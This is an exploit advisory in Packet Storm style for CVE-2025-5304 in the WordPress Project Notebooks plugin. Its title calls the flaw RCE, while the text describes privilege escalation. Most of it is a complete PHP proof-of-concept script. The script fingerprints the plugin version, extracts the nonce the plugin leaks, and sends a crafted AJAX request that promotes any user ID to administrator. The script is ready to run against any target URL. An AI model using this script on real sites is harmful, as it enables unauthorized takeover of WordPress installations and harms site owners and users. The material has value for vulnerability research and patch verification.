=============================================================================================================================================
| # Title     : WordPress Project Notebooks Plugin 1.1.4 – RCE vulnerability                                                                |
| # Author    : indoushka                                                                                                                   |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.1 (64 bits)                                                            |
| # Vendor    : https://wordpress.org/plugins/                                                                                              |
=============================================================================================================================================

[+] References : https://packetstorm.news/files/id/209970/ & 	CVE-2025-5304

[+] Summary 

A rce vulnerability exists in the Project Notebooks WordPress plugin prior to version 1.1.4, 
allowing unauthenticated or low‑privileged attackers to escalate any WordPress user to higher roles, 
including administrator, through improper validation of AJAX actions and nonce exposure.
This vulnerability is actively exploitable when the plugin leaks a valid nonce value and the AJAX
handler wpnb_pto_new_users_add fails to fully verify user capability requirements


[+] Vulnerability Details

The plugin exposes internal configuration objects (including nonce and ajax_url) directly in the HTML source.
An attacker can extract this nonce and send a crafted request to : wp-admin/admin-ajax.php?action=wpnb_pto_new_users_add

The handler then accepts user IDs (ids) and privilege levels (user_type) without validating whether the requester has enough permissions.
This enables:

Unauthorized user privilege escalation

Unauthorized role assignment

Full WordPress takeover if executed against an administrator ID


[+] poc

Run using: php poc.php -u http://target.com -id 28 -c "wordpress_logged_in=COOKIE_VALUE"


<?php
// PoC (CVE-2025-5304)
// By Indoushka 

function nxploited_headers($cookie = null) {
    $agents = [
        "Mozilla/5.0 (Windows NT 10.0; Win64; x64) Nxploited",
        "Mozilla/5.0 (X11; Linux x86_64) Nxploited",
        "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Nxploited",
        "Nxploited/1.0 (compatible;)",
        "Nxploited/2.0 (Special Edition)",
        "Mozilla/5.0 Nxploited"
    ];
    $headers = [
        "User-Agent: " . $agents[array_rand($agents)] . " | Nxploited",
        "X-Nxploited: Nxploited"
    ];
    if ($cookie) {
        $headers[] = "Cookie: $cookie";
    }
    return $headers;
}

function nxploited_normalize_url($url) {
    $url = trim($url);
    if (!preg_match('#^https?://#i', $url)) {
        $url = "http://" . $url;
    }
    return rtrim($url, "/");
}

function nxploited_fetch_version($base_url, $cookie = null, $timeout = 12) {
    $readme_url = $base_url . "/wp-content/plugins/project-notebooks/readme.txt";
    $ch = curl_init($readme_url);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($ch, CURLOPT_HTTPHEADER, nxploited_headers($cookie));
    curl_setopt($ch, CURLOPT_TIMEOUT, $timeout);
    $text = curl_exec($ch);
    curl_close($ch);
    if (preg_match('/Stable\s*tag:\s*([0-9][0-9.\-a-zA-Z]*)/i', $text, $m)) {
        $version = trim($m[1]);
        echo "[+] Nxploited: Detected version from readme.txt → $version\n";
        return [$version, true];
    }
    echo "[-] Nxploited: Could not parse version from $readme_url\n";
    return [null, false];
}

function nxploited_is_vulnerable($version) {
    $vulnerable_versions = ["1.1.3","1.1.2","1.1.1","1.1.0","1.0.9","1.0.8","1.0.7","1.0.6","1.0.5","1.0.4","1.0.3","1.0.2","1.0.1","1.0.0"];
    return in_array($version, $vulnerable_versions);
}

function nxploited_extract_nonce_ajax($base_url, $cookie = null, $timeout = 12) {
    $ch = curl_init($base_url);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($ch, CURLOPT_HTTPHEADER, nxploited_headers($cookie));
    curl_setopt($ch, CURLOPT_TIMEOUT, $timeout);
    $html = curl_exec($ch);
    curl_close($ch);

    preg_match('/"nonce"\s*:\s*"([^"]+)"/', $html, $m_nonce);
    preg_match('/"ajax_url"\s*:\s*"([^"]+)"/', $html, $m_ajax);

    $nonce = $m_nonce[1] ?? null;
    $ajax_url = isset($m_ajax[1]) ? str_replace("\\/", "/", $m_ajax[1]) : $base_url . "/wp-admin/admin-ajax.php";

    if ($nonce) echo "[+] Nxploited: Nonce found: $nonce\n";
    else echo "[-] Nxploited: Nonce not found in page source.\n";
    echo "[+] Nxploited: AJAX URL: $ajax_url\n";

    return [$nonce, $ajax_url];
}

function nxploited_exploit($ajax_url, $uid, $nonce, $cookie = null, $timeout = 12) {
    $data = [
        "action" => "wpnb_pto_new_users_add",
        "nonce" => $nonce,
        "ids" => (string)$uid,
        "user_type" => "2",
        "Nxploited" => "Nxploited"
    ];
    echo "[*] Nxploited: Exploiting… wait 3 seconds.\n";
    sleep(3);

    $ch = curl_init($ajax_url);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($ch, CURLOPT_HTTPHEADER, nxploited_headers($cookie));
    curl_setopt($ch, CURLOPT_POST, true);
    curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($data));
    curl_setopt($ch, CURLOPT_TIMEOUT, $timeout);
    $body = curl_exec($ch);
    $status = curl_getinfo($ch, CURLINFO_HTTP_CODE);
    curl_close($ch);

    echo "[+] Nxploited: HTTP $status\n";
    echo substr($body, 0, 1500) . "\n";
    return [$status, $body];
}

// ------------------------
// Main Execution
// ------------------------

$options = getopt("u:id:c:", ["url:", "id:", "cookie:", "skip-version"]);
$base_url = nxploited_normalize_url($options['u'] ?? $options['url']);
$uid = $options['id'] ?? $options['id'];
$cookie = $options['c'] ?? $options['cookie'] ?? null;

if (!isset($options['skip-version'])) {
    list($detected_version, $ok) = nxploited_fetch_version($base_url, $cookie);
    if ($detected_version) {
        $vuln = nxploited_is_vulnerable($detected_version);
        $state = $vuln ? "vulnerable" : "not confirmed vulnerable";
        echo "[+] Nxploited: Version $detected_version → $state\n";
    } else {
        echo "[!] Nxploited: Proceeding without confirmed version (use --skip-version to suppress).\n";
    }
}

list($nonce, $ajax_url) = nxploited_extract_nonce_ajax($base_url, $cookie);
if (!$nonce) die("[!] Nxploited: Abort: nonce not found.\n");

if (isset($detected_version)) echo "[i] Nxploited: Target version during exploitation → $detected_version\n";

list($status, $body) = nxploited_exploit($ajax_url, $uid, $nonce, $cookie);
if (!$status) exit(2);
if (strpos($body, "Busted!") !== false) {
    die("[!] Nxploited: Server replied 'Busted!' (nonce/session mismatch). Use correct cookie.\n");
}

?>


Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================